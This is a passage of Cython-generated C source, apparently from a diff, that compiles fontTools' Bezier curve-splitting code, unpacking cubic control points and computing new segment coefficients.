__pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 734, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_by = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":735 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * dx, dy = d - * for i in range(len(ts) - 1): - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 735, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 735, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 735, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 735, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 735, __pyx_L1_error) - __pyx_t_5 
= NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 735, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_cy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":736 - * bx, by = b - * cx, cy = c - * dx, dy = d # <<<<<<<<<<<<<< - * for i in range(len(ts) - 1): - * t1 = ts[i] - */ - if ((likely(PyTuple_CheckExact(__pyx_v_d))) || (PyList_CheckExact(__pyx_v_d))) { - PyObject* sequence = __pyx_v_d; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 736, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 736, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 736, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_d); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 736, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; 
- __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 736, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 736, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_dx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_dy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":737 - * cx, cy = c - * dx, dy = d - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - __pyx_t_6 = PyObject_Length(__pyx_v_ts); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 737, __pyx_L1_error) - __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_6 - 1)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (likely(PyList_CheckExact(__pyx_t_1)) || PyTuple_CheckExact(__pyx_t_1)) { - __pyx_t_2 = __pyx_t_1; __Pyx_INCREF(__pyx_t_2); - __pyx_t_6 = 0; - __pyx_t_7 = NULL; - } else { - __pyx_t_6 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 737, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - for (;;) { - if (likely(!__pyx_t_7)) { - if (likely(PyList_CheckExact(__pyx_t_2))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && 
!CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_1); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_1); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } - } else { - __pyx_t_1 = __pyx_t_7(__pyx_t_2); - if (unlikely(!__pyx_t_1)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 737, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_1); - } - __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":738 - * dx, dy = d - * for i in range(len(ts) - 1): - * t1 = ts[i] # <<<<<<<<<<<<<< - * t2 = ts[i + 1] - * delta = t2 - t1 - */ - __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 738, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_XDECREF_SET(__pyx_v_t1, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":739 - * for i in range(len(ts) - 1): - * t1 = ts[i] - * t2 = ts[i + 1] # <<<<<<<<<<<<<< - * delta = t2 - t1 - * - */ - __pyx_t_1 = __Pyx_PyInt_AddObjC(__pyx_v_i, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 739, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 739, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_t2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":740 - * t1 = ts[i] - * t2 = ts[i + 1] - * delta = t2 - t1 # <<<<<<<<<<<<<< - * - * delta_2 = delta * delta - */ - __pyx_t_4 = PyNumber_Subtract(__pyx_v_t2, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 740, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":742 - * delta = t2 - t1 - * - * delta_2 = delta * delta # <<<<<<<<<<<<<< - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_delta, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 742, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":743 - * - * delta_2 = delta * delta - * delta_3 = delta * delta_2 # <<<<<<<<<<<<<< - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_delta, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 743, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta_3, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":744 - * delta_2 = delta * delta - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 # <<<<<<<<<<<<<< - * t1_3 = t1 * t1_2 - * - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t1, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 744, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_t1_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":745 - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 # <<<<<<<<<<<<<< - * - * # calc new a, b, c and d - */ - __pyx_t_4 = 
PyNumber_Multiply(__pyx_v_t1, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 745, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_t1_3, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":748 - * - * # calc new a, b, c and d - * a1x = ax * delta_3 # <<<<<<<<<<<<<< - * a1y = ay * delta_3 - * b1x = (3 * ax * t1 + bx) * delta_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_delta_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 748, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_a1x, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":749 - * # calc new a, b, c and d - * a1x = ax * delta_3 - * a1y = ay * delta_3 # <<<<<<<<<<<<<< - * b1x = (3 * ax * t1 + bx) * delta_2 - * b1y = (3 * ay * t1 + by) * delta_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_delta_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 749, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_a1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":750 - * a1x = ax * delta_3 - * a1y = ay * delta_3 - * b1x = (3 * ax * t1 + bx) * delta_2 # <<<<<<<<<<<<<< - * b1y = (3 * ay * t1 + by) * delta_2 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta - */ - __pyx_t_4 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ax, 3, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_4, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_1, __pyx_v_bx); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_4, __pyx_v_delta_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - 
__Pyx_XDECREF_SET(__pyx_v_b1x, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":751 - * a1y = ay * delta_3 - * b1x = (3 * ax * t1 + bx) * delta_2 - * b1y = (3 * ay * t1 + by) * delta_2 # <<<<<<<<<<<<<< - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - */ - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ay, 3, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_4, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 751, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_b1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":752 - * b1x = (3 * ax * t1 + bx) * delta_2 - * b1y = (3 * ay * t1 + by) * delta_2 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta # <<<<<<<<<<<<<< - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - */ - __pyx_t_4 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_bx, 2, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_4, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_1, __pyx_v_cx); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ax, 3, 
0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_8 = PyNumber_Multiply(__pyx_t_1, __pyx_v_t1_2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_4, __pyx_t_8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Multiply(__pyx_t_1, __pyx_v_delta); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 752, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1x, __pyx_t_8); - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":753 - * b1y = (3 * ay * t1 + by) * delta_2 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta # <<<<<<<<<<<<<< - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - */ - __pyx_t_8 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_by, 2, 0, 0); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_8, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ay, 3, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_8, __pyx_t_4); if 
(unlikely(!__pyx_t_1)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 753, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":754 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx # <<<<<<<<<<<<<< - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_t1_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_v_bx, __pyx_v_t1_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_8 = PyNumber_Add(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_v_cx, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Add(__pyx_t_8, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_4, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 754, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_d1x, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":755 - * c1y = (2 * by * t1 + cy + 3 * ay * t1_2) * delta - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = 
ay * t1_3 + by * t1_2 + cy * t1 + dy # <<<<<<<<<<<<<< - * pt1, pt2, pt3, pt4 = calcCubicPoints( - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_t1_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_v_by, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_8 = PyNumber_Add(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_v_cy, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Add(__pyx_t_8, __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_1, __pyx_v_dy); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 755, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_d1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":756 - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( # <<<<<<<<<<<<<< - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_calcCubicPoints); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":757 - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) # <<<<<<<<<<<<<< - * ) - * segments.append((pt1, pt2, pt3, pt4)) - */ - __pyx_t_8 = PyTuple_New(2); if (unlikely(!__pyx_t_8)) 
__PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_INCREF(__pyx_v_a1x); - __Pyx_GIVEREF(__pyx_v_a1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_a1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_a1y); - __Pyx_GIVEREF(__pyx_v_a1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_v_a1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_9 = PyTuple_New(2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_INCREF(__pyx_v_b1x); - __Pyx_GIVEREF(__pyx_v_b1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 0, __pyx_v_b1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b1y); - __Pyx_GIVEREF(__pyx_v_b1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 1, __pyx_v_b1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_10 = PyTuple_New(2); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_INCREF(__pyx_v_c1x); - __Pyx_GIVEREF(__pyx_v_c1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 0, __pyx_v_c1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c1y); - __Pyx_GIVEREF(__pyx_v_c1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 1, __pyx_v_c1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_11 